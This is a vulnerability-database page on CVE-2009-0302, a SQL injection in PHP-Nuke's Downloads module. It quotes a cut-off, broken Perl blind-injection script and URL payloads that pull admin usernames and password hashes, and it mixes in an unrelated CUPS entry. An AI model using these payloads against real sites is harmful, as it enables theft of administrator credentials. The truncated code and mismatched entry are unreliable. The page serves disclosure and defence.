CVE-2009-0302
published 2009-01-27CVE-2009-0302: SQL injection vulnerability in the Downloads module for PHP-Nuke 8.0 8.1.0.3.5b and earlier allows remote authenticated users to execute arbitrary SQL commands…
PriorityP430medium4.6CVSS 2.0
AVNACHAuSCPIPAP
EXPLOIT
EPSS
1.46%
70.3th percentile
SQL injection vulnerability in the Downloads module for PHP-Nuke 8.0 8.1.0.3.5b and earlier allows remote authenticated users to execute arbitrary SQL commands via the url parameter in the Add operation to modules.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-nuke | downloads_module | — | — |
CVSS provenance
nvdv2.04.6MEDIUMAV:N/AC:H/Au:S/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-23xg-g252-mcgr: SQL injection vulnerability in the Downloads module for PHP-Nuke 8
ghsa_unreviewed·2022-05-02
CVE-2009-0302 [MEDIUM] CWE-89 GHSA-23xg-g252-mcgr: SQL injection vulnerability in the Downloads module for PHP-Nuke 8
SQL injection vulnerability in the Downloads module for PHP-Nuke 8.0 8.1.0.3.5b and earlier allows remote authenticated users to execute arbitrary SQL commands via the url parameter in the Add operation to modules.php.
Red Hat
cups Incomplete fix for CVE-2009-3553
vendor_redhat·2010-03-03·CVSS 7.5
CVE-2010-0302 [HIGH] cups Incomplete fix for CVE-2009-3553
cups Incomplete fix for CVE-2009-3553
Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS before 1.4.4, when kqueue or epoll is used, allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-3553.
No detection rules found.
Exploit-DB
PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection
exploitdb·2011-11-23
CVE-2009-0302 PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection
PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection
---
#!/usr/bin/perl
# [0-Day] PHP-Nuke new(POST => $HostName.'modules.php?name=Downloads&d_op=Add');
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
default_headers => HTTP::Headers->new,
) or die $!;
my $WaRWolFz = "http://www.warwolfz.org/";
my $DefaultTime = request($WaRWolFz);
my $Post;
sub Blind_SQL_Jnjection {
my ($dec,$hex,$Victime) = @_;
return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}";
}
for(my $I=1; $I F
$Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime);
$Time = request($Post);
sleep(3);
refresh($HostName, $DefaultTime, $c
Exploit-DB
PHP-Nuke Downloads Module - 'url' SQL Injection
exploitdb·2009-01-23
CVE-2009-0302 PHP-Nuke Downloads Module - 'url' SQL Injection
PHP-Nuke Downloads Module - 'url' SQL Injection
---
source: https://www.securityfocus.com/bid/33410/info
The Downloads module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Admin Username :
http://www.example.com/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+a
id+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
Admin Password :
http://www.example.com/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker
No writeups or analysis indexed.
http://1337day.com/exploits/15481http://osvdb.org/51633http://osvdb.org/77349http://www.exploit-db.com/exploits/18148http://www.securityfocus.com/archive/1/500335/100/0/threadedhttp://www.securityfocus.com/bid/33410http://www.securityfocus.com/bid/50770https://exchange.xforce.ibmcloud.com/vulnerabilities/48186https://exchange.xforce.ibmcloud.com/vulnerabilities/71475http://1337day.com/exploits/15481http://osvdb.org/51633http://osvdb.org/77349http://www.exploit-db.com/exploits/18148http://www.securityfocus.com/archive/1/500335/100/0/threadedhttp://www.securityfocus.com/bid/33410http://www.securityfocus.com/bid/50770https://exchange.xforce.ibmcloud.com/vulnerabilities/48186https://exchange.xforce.ibmcloud.com/vulnerabilities/71475
2009-01-27
Published